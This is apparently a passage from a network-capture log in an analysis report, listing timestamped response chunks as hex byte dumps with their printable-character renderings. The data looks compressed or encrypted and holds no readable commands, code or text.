                                                                                                                                  2023-07-18 15:37:06 UTC1376INData Raw: ba 93 e4 17 8b e9 d7 42 a6 2d 10 b4 cc 16 bb ef 46 63 24 2e ba ca 55 64 47 aa c1 27 81 eb 2e 6d 20 07 cf a2 f4 2f 92 c8 55 79 95 6b c7 fa 26 08 84 38 2e a2 9b 3a 13 0e 67 2f b8 67 5d 46 92 ab 04 f5 24 bc cd 06 17 5e ba 94 1b 79 3f bb cb 7a e7 c5 33 a3 9d 76 f4 e9 4f 43 f7 8e 8e 88 7a 0b c2 b5 1e 79 90 e5 ed 21 1f 9f e2 5e f9 9c 8a 11 0c 3f 3d 98 ed da b0 40 84 21 bf 5e da b5 f1 48 eb df 28 55 3f 16 90 31 19 ae 47 03 b8 2f 3e 56 14 b5 76 52 17 b2 37 fc 7a 4e d0 df b9 48 2a 8f 62 24 0a ab eb 8e 6f 6f 05 1b 4d 1f f3 f7 5b 2d 7c 0d c6 d4 50 19 22 75 77 65 4d 44 26 b9 9a e6 29 14 84 68 e5 42 34 9d e4 58 0d 70 69 da 67 81 10 f7 75 fc 50 d3 01 b5 a1 a2 c5 20 9a 22 fe 77 b9 0f 28 2d 41 72 b3 96 bb 0c c4 9a 9c ec d8 95 7a 13 5f f2 0a 28 96 71 ea 2b 1e f9 00 6f e6
                                                                                                                                  Data Ascii: B-Fc$.UdG'.m /Uyk&8.:g/g]F$^y?z3vOCzy!^?=@!^H(U?1G/>VvR7zNH*b$ooM[-|P"uweMD&)hB4XpiguP "w(-Arz_(q+o
                                                                                                                                  2023-07-18 15:37:06 UTC1392INData Raw: 03 e3 eb c2 32 39 dc 95 c8 eb 5e 2b eb 4e 2a 0e b4 7b 94 c8 86 59 61 2f bc 7f 4a fc 29 ee f9 2d ec e1 f4 82 c2 1c 77 a0 d8 d7 9e 43 33 44 22 d5 25 5b f7 54 87 c5 4c a3 5e 73 81 93 b5 59 0f 55 8f 71 a6 46 a2 e6 1d 8e 32 64 0c f8 c5 f7 6f e8 a9 23 87 da 1d e2 57 6a 70 27 a3 f2 ab 1d c7 5e 9b 83 03 6d 45 12 ca d1 24 3f f1 af 7b 00 a3 11 4e 00 e4 f9 7d fe 7e 9e 94 3b 49 17 2f 0d 2d c7 84 90 e3 2d 63 0f fc 84 c5 3f 4e 8f c7 f9 41 9b 1b 79 b3 25 45 7e ed 3a 48 51 3e 12 74 a2 93 7b 6b 76 5b f9 d7 2c 1c 17 1a f5 b2 05 06 92 75 95 0f 8e 8b e9 93 9b a4 b5 19 de 8e 56 9a 26 be af 5d 67 0d bf 4f 78 21 64 e1 74 cc 5f dd 5f 9b 06 31 b7 b5 98 8b e1 63 f2 f4 6d f6 05 56 6b 1f 47 90 6a f9 a8 91 df 29 01 d0 8b 9f 5d 85 a2 09 6b d6 37 71 8b d6 24 25 ae 66 77 42 2e 8a 52 28
                                                                                                                                  Data Ascii: 29^+N*{Ya/J)-wC3D"%[TL^sYUqF2do#Wjp'^mE$?{N}~;I/--c?NAy%E~:HQ>t{kv[,uV&]gOx!dt__1cmVkGj)]k7q$%fwB.R(
                                                                                                                                  2023-07-18 15:37:06 UTC1408INData Raw: c3 3d f4 06 cc 6c 96 88 91 8e cb 2c 9f a5 8c 41 0d e6 ef 3e 2c 74 c2 7f b1 68 13 fc 37 5c fb 09 15 5b a7 23 c4 1d 4c 16 7d ea 45 dd c4 0e fb d9 2a 93 76 e7 e3 15 91 9a 1a a0 b8 0e 82 13 cc bf 6a 14 60 16 79 0a 85 40 30 8f 06 7f 32 9e a9 7e 21 29 fd 5d df 7f 45 ee a4 c2 88 42 bd ce ef 65 72 40 d5 9b a3 ac 47 81 9c 0b 35 b6 65 b6 b9 d5 f0 bd 86 eb 29 ea cf 41 05 32 fd e8 92 6b 50 34 5a 49 00 18 db 12 d8 26 50 3a 77 85 7b 90 67 fa e1 13 23 f3 f5 1b 1e a4 68 04 90 ce 68 6a a9 a4 ca 77 40 4a 0d 03 04 5b 99 93 c7 ba 33 7f 6e bc 6d e3 78 bf 09 74 92 aa 45 ab e1 34 75 65 f4 f0 ca fe 7d d9 30 24 5c 88 32 dc 9c f5 6f 33 d0 82 e9 c2 cf fe a0 6d d2 ae 26 f0 0e c8 3a d2 23 a9 8e 74 36 3c 36 f4 6d 27 df 06 09 53 d8 c8 cd 80 44 c6 f3 d7 7e 5e 02 19 55 5a 8d 07 3e 86 c7
                                                                                                                                  Data Ascii: =l,A>,th7\[#L}E*vj`y@02~!)]EBer@G5e)A2kP4ZI&P:w{g#hhjw@J[3nmxtE4ue}0$\2o3m&:#t6<6m'SD~^UZ>
                                                                                                                                  2023-07-18 15:37:06 UTC1424INData Raw: db d3 3e ed 62 8c 7b 4e f1 2b d8 f0 f8 c6 46 6e af 2d 53 b8 e6 4a 10 f9 33 16 c5 92 5e a8 2d 92 a2 aa f6 31 82 8a b4 ec b3 b4 ef 4b 7d 7f a5 e4 aa a6 67 c3 29 c5 ff 12 57 19 94 e9 9b c1 09 bf 40 fa 2c a9 ac da bc ec 0b 0e 1d 53 ab bd fc 9f 51 4a 9b 34 cc 64 24 b9 e4 06 32 22 28 80 06 52 28 77 58 e2 cc 68 ef 88 44 6d b3 1d 4f cd 29 5a af 3b b9 ea 13 b4 c7 03 41 e5 87 44 5b 2c 8d 8c 19 db 6a da db 50 4a 2b 9a 23 11 e3 a5 c7 b1 67 eb ca 76 b9 37 62 0a a1 22 8e 10 fd 7e 34 7f 64 bd b4 6e 04 a8 63 1d 8a 9e aa d0 fb 8f 15 d6 6d 87 a6 7e 16 76 17 b0 ac 6a 34 c2 f9 b4 72 2b 67 e9 a2 7b f4 b4 af 24 b0 b6 4f 29 b1 32 58 92 1a 68 f1 34 0c fd aa 1a 1f 1f 21 a2 97 e2 04 25 e5 82 39 39 79 b5 ad 24 4e bf 86 39 a4 f4 53 fe 41 5d ae 19 df c7 ad ea 35 b0 58 21 5e 06 3f 19
                                                                                                                                  Data Ascii: >b{N+Fn-SJ3^-1K}g)W@,SQJ4d$2"(R(wXhDmO)Z;AD[,jPJ+#gv7b"~4dncm~vj4r+g{$O)2Xh4!%99y$N9SA]5X!^?
                                                                                                                                  2023-07-18 15:37:06 UTC1440INData Raw: e7 f6 91 00 b8 8b 0e b0 7d c0 e7 3c 31 7f 48 71 9b 46 fe 3a 34 ad df 92 9e 3c 7d 60 3e 7d 9a 75 66 5d 14 5b 20 6d 5f 58 79 06 b9 5b 9f 84 c3 64 4e a2 cd 8c 5a 4b 2c 7c ce da 98 94 33 ab 11 e4 e6 3a e5 99 08 6e 9a 0c db d3 44 05 d5 53 5d c4 91 36 31 d5 13 09 c5 a5 93 9b a9 a2 4f e4 9f 84 0b 8d d5 42 d9 09 fd 9f a1 fc cf 7f 11 de 8e 35 a2 df 41 ce e1 c8 3d f3 e4 ac c8 fd b8 75 4b 04 c2 78 fe f1 05 d3 b3 df ed 64 f8 56 b7 1b a6 e7 c0 ef b9 88 c7 74 2d d5 34 f4 f5 5f 0f 3b 02 2a 9c bc 6f 82 94 24 c5 1d 7f 86 83 7f 25 ed 14 28 2a 5b 1d e7 7a 5a 5d 11 d9 a5 06 32 fe a7 bc 42 aa a8 5d 2e c4 24 41 08 53 c3 25 9b 17 0f 01 ae c0 e0 23 46 9d 18 96 d1 1d 0a b8 64 4f 2b 32 de 4e 5e b2 75 64 8c ff 14 ed 5d 68 e6 6a 5a 82 49 be 41 f0 9f 45 fd f4 1e f0 91 12 2a 2d d7 57
                                                                                                                                  Data Ascii: }<1HqF:4<}`>}uf][ m_Xy[dNZK,|3:nDS]61OB5A=uKxdVt-4_;*o$%(*[zZ]2B].$AS%#FdO+2N^ud]hjZIAE*-W
                                                                                                                                  2023-07-18 15:37:06 UTC1456INData Raw: 32 7f 6a ae d1 9d 7d 4c ce c8 54 2a b7 80 f2 c0 97 42 50 6b 2b 8a bf 7a 8d ed cd 6c b7 ae 02 44 c0 0c 8e 0d 33 e9 1e 43 6d 18 a2 4e 58 bd 75 b7 d1 6e 41 45 0c 0c 51 fc d0 56 bf 51 8e c9 70 cb cb fd 6c 8f 12 9c 28 3a 74 5d ed 57 4d b1 7a a3 a6 17 15 b8 13 a8 88 d1 ef a3 54 75 71 0a 7b 63 62 fe 36 8a bf d3 34 a1 1d 0c 6f e0 41 e2 9d 64 b6 a5 3d 9c cf 18 cf 9e 3e 45 fc 56 63 c6 64 e3 52 d0 63 a5 2c 61 b3 f3 60 22 5a 4f e1 0f af 52 3b 9b de b7 cc 59 ca 81 ad a8 36 d4 38 07 85 0b 97 1e 04 6c f0 ff 52 4b 10 06 c9 76 74 39 49 e5 f7 aa 25 ee 24 de 03 cd ad 06 dd 26 68 af 40 c2 93 6d aa 7e a9 bf 3e 11 58 de d8 32 08 69 76 f2 32 ba 7c f1 e9 dc 53 96 c0 b5 93 9d 2e 27 78 45 7e 07 26 f8 e1 db da 91 a8 a1 ea 61 1b ab c8 9f a5 ed e2 32 fc 2f e7 14 4f d9 08 a2 c8 e0 7f
                                                                                                                                  Data Ascii: 2j}LT*BPk+zlD3CmNXunAEQVQpl(:t]WMzTuq{cb64oAd=>EVcdRc,a`"ZOR;Y68lRKvt9I%$&h@m~>X2iv2|S.'xE~&a2/O
                                                                                                                                  2023-07-18 15:37:06 UTC1472INData Raw: cb 6c da 2f 73 b3 e5 91 9e 0a b7 99 4c 49 79 93 cc ce 23 80 f2 c0 63 69 d1 b7 b4 5c 67 bf a1 e0 68 1c 61 95 b0 c7 be 4e aa 3d ab ab 2d cd 67 96 c4 64 3a 5c 2b 27 61 86 6b a7 ab eb 76 be 36 88 64 a0 c0 5c a2 f2 f0 5b 67 2a 6d 60 27 30 e2 bb 42 15 9d 3f de e5 65 3c 08 fd cc 2c 42 e5 26 94 c1 98 af e0 bc 06 50 bd 44 bd 4a 33 fe f2 a1 a3 cc b6 84 31 ca 69 73 2d 41 e6 d1 2c ce 20 d0 38 d7 78 49 b7 57 ca ba 22 8f e5 3e 81 c0 3b a1 76 a9 16 33 4e 3b 59 aa 8f 0c 2a 93 61 7f 6b 7c f2 99 55 ed 50 0d 47 57 3e ac fc d2 ab cb 12 10 ba 4e fd c0 9d 8e 96 87 b1 91 0d ff a1 01 a5 fa 60 38 b4 8c c4 c2 0e fa 5e eb 5d 14 37 56 b4 1b 9d 14 5a d4 12 a6 98 03 cc 1e 76 62 a5 3d 88 b8 85 fc 1e 89 66 e0 e6 33 5f 73 ed ba 39 fb 02 4e c9 54 51 d2 1c 0e 1d d0 7e 5c f4 65 39 51 b6 d1
                                                                                                                                  Data Ascii: l/sLIy#ci\ghaN=-gd:\+'akv6d\[g*m`'0B?e<,B&PDJ31is-A, 8xIW">;v3N;Y*ak|UPGW>N`8^]7VZvb=f3_s9NTQ~\e9Q
                                                                                                                                  2023-07-18 15:37:06 UTC1488INData Raw: 48 f2 dd a0 95 47 69 2c 3c ef 92 4b d5 79 8b 6d 2f 5d b1 76 6d 34 13 ac bd 41 ad 1b 44 f8 63 78 ec 18 8c 97 9b 46 c0 88 96 e2 c1 dd fd 7c 78 70 2e ec 9d 69 be 2c 05 3f 2c bd 6b 0b 0c 87 bb 69 11 56 3d d2 82 c0 e8 8c 4f 91 97 d1 4f 08 30 7a 5f 77 9b 9c 7b dc b9 9f 86 33 3c fc e7 f3 6b 05 44 66 2b ad e4 24 e6 24 5d 0c 1b fe 33 43 87 b6 61 b5 b5 0f e8 36 c4 d0 eb c2 b4 c2 1d a1 f7 e9 ce 2f a8 7f 1e 10 ee 1a 3f 88 bf 76 d0 0c 3c 87 03 98 80 0d 44 b2 b5 f7 75 86 b8 b1 a3 be 20 1e 7f 1a 0f 22 3d e0 2c 33 a2 cc 9d a8 6b fa 6d 22 02 29 26 a2 94 25 45 5b 80 c7 7b 84 37 9e 2d 09 06 4d a9 f5 43 4b 3e 65 1b 3a e5 8a d9 d3 9e 6d 7e 41 79 7d 04 59 9f 3b 5e 45 de e3 e1 3a e0 aa 9c 4e 40 c8 14 8d e9 1d c3 bb 06 c5 58 f3 f4 76 0b bb 69 62 b1 e1 13 78 c8 f8 c7 e9 6d 98 7c
                                                                                                                                  Data Ascii: HGi,<Kym/]vm4ADcxF|xp.i,?,kiV=OO0z_w{3<kDf+$$]3Ca6/?v<Du "=,3km")&%E[{7-MCK>e:m~Ay}Y;^E:N@Xvibxm|
                                                                                                                                  2023-07-18 15:37:06 UTC1504INData Raw: de 12 fa 4e 30 8d ea b4 82 a1 4b ad c6 43 a0 64 26 f5 10 b8 c9 05 99 2f e6 0f c2 14 80 8a 0f 50 2d ad af 6c 45 2e 82 8a b8 e2 9f 98 ca 52 d7 0f a2 1a 95 c4 b5 5a 66 ea 1c 37 2b dc 07 45 86 da e5 02 20 af e1 db ee a5 84 a4 f0 bc 62 30 88 70 63 8b fb 38 69 92 ae 2a 9e fe ef 2e ef 73 f4 7e 71 75 12 b8 5f 18 b9 4e cd ce b7 76 5d ca bf 2b f3 27 2f 27 bb 08 10 0d d2 3a 94 75 7a 44 8e ae 33 59 1a 6c 70 71 74 fb 0b 08 19 af 28 30 78 f1 a7 a0 61 b3 c8 80 36 61 20 eb b2 f6 bf 8b 4a 0a cf b9 b8 93 de 48 47 e7 bf 77 e2 42 85 05 df 6a 40 86 d5 bf 73 cd d7 f0 30 2e cf f2 57 0d 58 22 be 9b 21 18 45 ec 16 bd 7a 16 80 5d 4f e3 bc 07 bd 0a 01 ef 40 9d f9 5e 2d 78 8e b3 76 5a c4 02 10 ef ba 20 84 a9 cc 75 e8 47 2b 21 60 91 42 a2 cc 84 fd a0 19 41 f7 e8 52 6b 5e 7c c6 72 db
                                                                                                                                  Data Ascii: N0KCd&/P-lE.RZf7+E b0pc8i*.s~qu_Nv]+'/':uzD3Ylpqt(0xa6a JHGwBj@s0.WX"!Ez]O@^-xvZ uG+!`BARk^|r
                                                                                                                                  2023-07-18 15:37:06 UTC1520INData Raw: 95 c0 65 02 e3 88 1a 3e 17 3e 07 64 68 91 7b 54 47 89 09 b9 7c 5c 7b de 52 7b 6d c6 d6 06 8d a1 00 14 72 d0 0e 31 9b 8d a8 07 d1 e6 b7 fa 61 b9 1c a4 bc ca 80 4e e5 5f 89 79 ee 3c 3c be 08 3d e6 17 28 c2 fb 08 2c 78 2c bc ec ae 3e d0 5f 9d a3 a1 70 2b 8a 73 26 89 40 09 38 b5 45 29 b8 be 0f b7 97 2a 1f 29 52 53 e8 1d 06 d6 64 7b 09 4b 84 fc 01 e9 dc d8 98 c6 ba 54 5d 1a c9 2e de ff 84 62 cb 59 e4 c7 82 3a 16 c1 20 dc 26 17 0e 0e 92 ea 14 23 43 5d 70 bd f0 09 ee 02 87 a8 e0 e9 3c 51 e1 37 d7 5f 9c 5d 43 9a 7e 4b 49 ad 86 0c 9d fb 93 c6 7d 74 79 72 78 74 8e bd 4f 4b cc 0f 13 e5 b9 6c 75 0e 76 c8 92 80 ff 3e 26 b1 f7 79 21 b6 17 81 76 f3 cb 6a 43 f6 d8 56 64 fa 4f ad 7b b9 c1 e4 e7 fb ea 3a a4 1e c0 80 5b 9a 8a 49 9a 5b 99 4f 46 11 1e 2a d3 3e 18 99 10 b3 97
                                                                                                                                  Data Ascii: e>>dh{TG|\{R{mr1aN_y<<=(,x,>_p+s&@8E)*)RSd{KT].bY: &#C]p<Q7_]C~KI}tyrxtOKluv>&y!vjCVdO{:[I[OF*>
                                                                                                                                  2023-07-18 15:37:06 UTC1536INData Raw: 51 07 0f e6 f1 04 12 69 fd 06 de 10 d0 08 02 36 9f 21 b4 fe 5d 19 3f f1 11 f7 d0 58 fe 5f 06 d7 67 0e 47 ed 16 42 0d db b1 08 ce eb 18 32 2d 4d 27 87 c9 d7 a0 f2 46 d4 cd 64 b6 a0 a4 5c 2b 9c 0e f8 09 03 67 7f f9 53 f4 9c b8 4f e4 df 1d c7 d2 2c 1e ec d9 8b 87 2b 12 23 b1 98 96 f7 18 c0 65 13 d1 2a 75 53 8d 9f 32 7c e9 db 05 a9 9f b4 a0 bf de 49 1c c5 e0 35 60 83 95 73 eb 8c f0 65 46 60 00 68 4f 14 63 40 60 c9 6c c0 73 80 f7 bc 7c d0 94 5e cc 6b fe 5c f2 d7 48 fc 4e 49 e6 e9 3a 97 64 25 6a e2 f0 3f 72 b9 36 6c a4 65 01 49 c5 a7 9e dc 68 3b 07 d5 4a f2 fb 07 5b 57 0a 1f 5a 50 a1 33 5d 36 01 82 40 03 90 07 15 0c 2a 59 7a 3e 78 72 f0 fa 03 c4 0c 4b e1 e6 82 fa 95 44 95 fa 4f cc e6 97 0d 6a 6c db 57 78 c6 85 57 77 00 c8 10 8f 07 54 f6 42 c3 23 71 7a 6b ca eb
                                                                                                                                  Data Ascii: Qi6!]?X_gGB2-M'Fd\+gSO,+#e*uS2|I5`seF`hOc@`ls|^k\HNI:d%j?r6leIh;J[WZP3]6@*Yz>xrKDOjlWxWwTB#qzk
                                                                                                                                  2023-07-18 15:37:06 UTC1552INData Raw: 97 42 35 ca c2 d4 10 dd ae ad bc 83 b1 a7 8c 2d 2c 7a 0e 8b 8f d9 bb f0 36 57 c2 b6 8b 40 c0 d1 bd 68 bc fb 3a 90 35 8c d0 4b 37 83 2e 5a 94 e0 45 cd 8b c2 d1 89 e9 eb 21 4d e1 7e 04 2d 07 52 92 93 2d e2 45 0d 8f ed 39 9c c8 a0 99 d2 32 76 95 ae 13 e1 b3 39 93 b3 99 c0 cf e4 b0 f4 fa 7c c0 22 15 2e f3 4b 7a 29 b3 a4 f3 53 9a bf 1a 47 f3 2f 69 5a df 7b c8 65 11 06 31 82 56 68 bf 05 4e 61 96 5f 1f c9 07 0e 5f 46 71 33 c3 6b 1c dc 5f 71 57 21 86 d0 a5 13 95 cd 0b 90 e8 29 4a e8 cb d7 80 47 87 a2 b1 82 98 3b e5 5a 7b 50 ce cc 5d c2 35 ed 59 39 5e d1 e2 6f a6 ec b2 67 e2 47 04 6e 38 f8 b6 3f bd c4 1d ab 8b fb 69 a9 e6 ea 75 55 5b 6e d7 3a 5f a4 fb 92 e9 bf c4 45 00 69 48 bf 18 46 a7 6e 81 8f ea e9 11 f7 ae f8 ba 12 45 fd 78 bd 24 2c fb 71 cc 49 95 a4 89 d0 c8
                                                                                                                                  Data Ascii: B5-,z6W@h:5K7.ZE!M~-R-E92v9|".Kz)SG/iZ{e1VhNa__Fq3k_qW!)JG;Z{P]5Y9^ogGn8?iuU[n:_EiHFnEx$,qI
                                                                                                                                  2023-07-18 15:37:06 UTC1568INData Raw: 6e 5e 11 37 79 66 0d 32 35 09 a1 6e 79 c4 73 c0 4f 7e 0f 3d 8e 69 41 df 5d a3 df b1 7f 26 cf 24 58 d5 af 61 45 95 17 f0 65 79 06 89 8e 13 6b 7d b8 5f d1 b9 84 25 d9 7f 9f d3 02 ab 30 80 95 3b 29 50 49 a5 5e 12 2e 42 76 39 02 8b 43 8d c6 9a 7e 2e 88 de 32 95 8c 6d 08 f3 0a 60 9b 4d 55 a4 b6 41 14 db 61 2f 18 8a 62 42 9b 19 4a 2e 71 6c 93 9f b2 a0 3f 41 8e 49 ce 17 3f 1c b9 46 0e b6 af 4f 0e 58 a7 2a 6c 59 0a df 3f eb 6a 73 1c 38 ad e1 85 fd 81 31 d9 85 a2 18 41 9e 72 2c 0f 34 d0 56 25 c3 0b bf 23 9d 49 9e 77 74 f0 26 c2 22 d3 cf 0a b9 66 91 cf 3d 04 08 c1 d4 2f 3e 54 80 b7 c8 6d 04 33 d3 96 44 9d 5c 1e 59 16 44 3e 5e 2e 01 24 87 a7 83 70 d2 f0 64 1b 06 73 bc 61 32 ee 25 1e f2 40 79 9e 99 70 bc 67 70 d7 03 b9 4a 71 32 39 e0 4f 1f 48 63 cd c3 4a 63 0f 3b d1
                                                                                                                                  Data Ascii: n^7yf25nysO~=iA]&$XaEeyk}_%0;)PI^.Bv9C~.2m`MUAa/bBJ.ql?AI?FOX*lY?js81Ar,4V%#Iwt&"f=/>Tm3D\YD>^.$pdsa2%@ypgpJq29OHcJc;
                                                                                                                                  2023-07-18 15:37:06 UTC1584INData Raw: 52 21 4f 67 bf e5 c1 ad da 9f 7b ba 87 83 7e 41 8a a5 57 e9 25 77 9e 1e 76 28 10 e0 48 e2 b9 1a 71 96 a6 c9 af f0 46 60 5b 63 a2 9a fb 4f ac fb f5 04 87 31 a2 b8 58 66 62 5b aa b1 d0 e6 d7 15 b5 c4 95 68 a9 59 aa 65 75 3a 9b 30 35 ba a8 74 11 4a 40 de 23 cb ec 22 e1 98 fc dd 79 f2 44 4f a7 16 fc c4 eb ac af 2d e8 92 f5 bc 66 9a f1 33 06 7a 84 17 b7 0f 48 39 30 ec 55 55 ce a3 cf ce 9b 93 bc a0 90 df 08 b5 13 89 44 ae b3 e1 f2 5a e5 a0 e3 a0 e8 90 8f a3 3e 27 8e 41 7c e5 1f d3 d8 e8 aa 32 39 b8 1a 0e 66 97 be 5f b0 10 bf ce 85 90 76 87 19 2d c5 e8 92 1f 32 6a b6 2c a2 51 15 62 76 bf 0e 6f 87 69 f1 73 7d 89 27 d8 81 10 bc f5 4b 00 64 b5 45 26 cc fa c1 71 3e b7 ec 6b 69 60 b0 2c 38 bd ba e9 50 a2 9e 23 bb 46 06 2d f8 d4 ff 79 78 9c 9e 3e c6 ac f4 b9 83 90 ea
                                                                                                                                  Data Ascii: R!Og{~AW%wv(HqF`[cO1Xfb[hYeu:05tJ@#"yDO-f3zH90UUDZ>'A|29f_v-2j,Qbvois}'KdE&q>ki`,8P#F-yx>
                                                                                                                                  2023-07-18 15:37:06 UTC1600INData Raw: 4d 3c 0d 75 e7 49 f8 e2 1b d5 08 4c e1 db e6 ad df f5 99 05 9d 27 bc a4 30 30 7e e2 1d 2b 0c 5d f2 9f 25 aa 86 a7 38 7e 45 dd aa d2 b9 46 36 b0 08 dd 4f 28 af c8 1f fe 48 d0 9b 6c e1 82 58 36 27 d0 4b e8 d1 9a c5 d6 33 e0 30 42 84 73 bc d5 64 53 9c 44 36 8c 74 e5 80 99 d2 27 19 29 d3 50 40 4f 94 bb 23 60 6d 83 a1 27 85 45 ed d4 28 c6 18 86 68 1a 09 e4 2b a9 36 2c da 59 40 4b a0 42 cc 39 3f 67 e1 a2 d4 ad b6 2a 25 2e 07 d3 16 5e c2 ad d4 90 c5 4b f1 9c 73 e8 a3 1e f2 0c 87 a4 86 9c 9d 50 64 09 7b 61 63 0f de 92 92 60 1f 1b e7 9b 8d 52 6c f8 26 99 00 c5 47 f2 0d 96 ab ba 83 f0 b0 a0 46 fb 4f 1c 38 9f c8 91 c6 39 48 47 7c 65 03 0a 8a 0c 16 78 13 5b 54 86 e0 10 7b 87 f1 70 e0 31 e3 44 50 e6 1b 5e 5a 9d 54 08 66 5c 2a 8b 66 97 a0 66 19 61 f1 93 96 72 18 e3 01
                                                                                                                                  Data Ascii: M<uIL'00~+]%8~EF6O(HlX6'K30BsdSD6t')P@O#`m'E(h+6,Y@KB9?g*%.^KsPd{ac`Rl&GFO89HG|ex[T{p1DP^ZTf\*ffar
                                                                                                                                  2023-07-18 15:37:06 UTC1616INData Raw: 8d f7 7e 6f 71 ca 37 6f f8 d7 c5 fc 08 59 96 7d eb 11 3b 06 20 5d a7 9e a9 e5 ab 9e 73 a3 f5 2c 13 8a 38 71 72 73 e5 a5 29 22 0f 04 26 f7 55 78 b6 9e 16 6d a8 f3 c5 fa b5 84 35 3e b6 f4 7b 48 76 c3 9a 65 3e f5 46 19 22 7a 0a f7 4e 7a ef 9c d2 e7 f8 e9 2f ad c9 fc 7a 1c 6b b9 54 62 84 0c 47 aa 17 23 8c a5 2a 5d 5a 75 de e0 62 ee d3 18 08 cc 51 0d 08 db 74 58 2b 56 0d 23 5c 75 ff 56 1e 47 4d d4 31 b1 c4 93 15 16 90 8b 46 5f d8 21 b6 e0 a4 83 e3 bc a9 e7 72 ed e2 ad 7a 81 2b 51 e0 c1 4d 4e 8f b9 df 14 4c 81 25 e5 e0 58 1f 5e d6 a5 50 03 7e 05 1f f0 0d 52 53 18 f2 26 2c 51 27 c4 16 42 32 33 4e 68 0e e4 50 4c 74 2e 26 30 2d cc ee fd 0f 34 9d 5c 83 be a6 56 28 55 77 43 9b 15 24 f3 0f 27 89 e5 03 97 f1 73 54 31 12 a3 c5 72 0d da e9 72 0a 3f e2 20 21 0c a9 05 f1
                                                                                                                                  Data Ascii: ~oq7oY}; ]s,8qrs)"&Uxm5>{Hve>F"zNz/zkTbG#*]ZubQtX+V#\uVGM1F_!rz+QMNL%X^P~RS&,Q'B23NhPLt.&0-4\V(UwC$'sT1rr? !
                                                                                                                                  2023-07-18 15:37:06 UTC1632INData Raw: a7 2f 66 67 d8 51 30 d7 f8 ed ab 98 af 3f e8 c1 6c 94 17 2d 57 25 10 27 3f 0d 66 d9 7d 8a e5 dc 65 a6 e8 95 e7 76 3b 47 89 9c f1 e8 27 53 7e 41 4a 8c 61 58 f0 98 1b 6d b5 01 f1 c8 29 71 84 bc dc 4b 3b 96 d4 88 a4 95 90 0b a7 97 b9 62 ac 20 04 16 ed 45 22 3f be 86 e3 a1 c4 91 d0 79 b2 8c 5e 51 01 01 a2 5a 3c c8 dd 19 15 5e cd 51 9e e8 f8 5d bd 0b bd d8 1b 2a 36 0f db 9c 47 fb 96 96 be 9b 3f 30 3c 20 94 25 3a 34 71 7b d4 14 36 ef 61 6b d4 47 3c 37 48 33 be 78 8e ae 8a 40 51 bd c1 2b 67 a3 14 40 22 76 66 62 e4 e0 d9 0e b4 cf 07 21 d1 7e 37 70 d7 4a 45 40 c3 53 d1 ec 9e de 16 9b 90 8a d2 49 ae c5 d5 39 21 05 73 cd 37 b6 b9 0c ee 34 21 35 e3 c4 13 fc af ef b7 c6 2e d9 fa ca 9c c7 ef 6e 87 17 77 a7 b3 9e 3e 0e c0 a4 9c ef 92 d1 9f b1 4e 5f 48 69 43 ab 7a 1d dd
                                                                                                                                  Data Ascii: /fgQ0?l-W%'?f}ev;G'S~AJaXm)qK;b E"?y^QZ<^Q]*6G?0< %:4q{6akG<7H3x@Q+g@"vfb!~7pJE@SI9!s74!5.nw>N_HiCz
                                                                                                                                  2023-07-18 15:37:06 UTC1648INData Raw: 9b eb 3b 6b af e9 da d2 ff 0c 2e f1 f0 4b 62 d2 33 8b 10 26 e7 1a 42 e7 97 ae 56 6c 77 3a d7 24 8a b2 a7 f9 31 41 48 2e aa 15 a4 9e 17 d0 ab 45 7c 40 0e bc 74 e8 63 a5 77 3e 28 52 20 b0 6b 02 f8 20 e1 5b c1 74 ff 2b 64 2b 49 10 08 ae 5a fa a6 79 cc ad e5 87 2f 68 92 c8 2b fa 15 d2 54 48 03 d9 5f 87 7c c7 9c 4c b8 aa 51 32 7e 49 9b 70 15 a7 ab cc 27 d1 4d fa 11 46 11 35 a5 b5 28 52 5a 41 b0 0b fa 01 af b5 44 ed d5 4a c5 17 20 22 d1 3a aa 5c f7 7f 46 f7 f5 42 46 15 2c b9 c3 49 fc 9a 34 ac 56 bb e4 54 9c a6 07 41 ac d8 9c 54 cf 5b 22 da 38 2c 10 48 ea df e1 36 63 2e 8f e7 9e 00 bb cf 01 c4 a9 ae bf 46 b4 45 1e 8c 30 e6 a4 56 9c c1 87 57 06 5d 28 fa 76 c8 79 76 44 1d 89 24 ef 61 f4 0d b0 5c e9 b4 c0 58 55 e2 9a fb 5f d0 0a 72 4d 27 02 c3 a5 1e c7 49 38 32 97
                                                                                                                                  Data Ascii: ;k.Kb3&BVlw:$1AH.E|@tcw>(R k [t+d+IZy/h+TH_|LQ2~Ip'MF5(RZADJ ":\FBF,I4VTAT["8,H6c.FE0VW](vyvD$a\XU_rM'I82
                                                                                                                                  2023-07-18 15:37:06 UTC1664INData Raw: 23 e9 ab a9 28 19 15 44 a6 25 d3 1f da 98 88 6e 3d 0c 9f 01 79 85 f7 46 d9 8c 8b de 46 d3 46 69 3c 2b cd b5 d0 da 94 e6 17 9d 95 75 de 09 9d 7b ce dc 0c 34 18 30 fe ae 7c d6 33 63 81 2e 48 6a 3e 3d dc 47 a0 4d 04 43 37 11 b3 8c fe 53 bb 40 cd e9 0f 93 fb af 1a 68 05 4f 52 bb a3 7c 71 85 3e 7f 73 f5 11 f9 45 51 c0 f3 8f 82 03 fb bf d6 04 64 91 31 85 5d 38 3b 06 c1 0e 92 0a 43 89 8b 33 3c fc f2 1b db 0b 16 5a f3 c2 35 d0 38 7f d4 88 91 c0 bb 0d 32 33 3a 50 5a 57 a3 02 14 e0 c8 b8 0f 21 24 6c 5d 41 ca 68 f8 ab 8c a0 d5 a0 11 d5 96 e0 ed 2f 16 a8 7f 2e 16 d4 bd d7 2c 42 46 b1 a0 90 37 36 1a fb 9d 99 6e 99 c4 7d a7 37 d5 5f 75 62 5c 01 37 f0 74 bb ef 05 18 29 29 39 e1 7c 85 79 ff 8a f6 14 4b e0 e8 6e 3d dc ec fb c9 5a 8f 73 d9 0b 97 f2 28 55 62 12 ff 17 e9 9a
                                                                                                                                  Data Ascii: #(D%n=yFFFi<+u{40|3c.Hj>=GMC7S@hOR|q>sEQd1]8;C3<Z5823:PZW!$l]Ah/.,BF76n}7_ub\7t))9|yKn=Zs(Ub
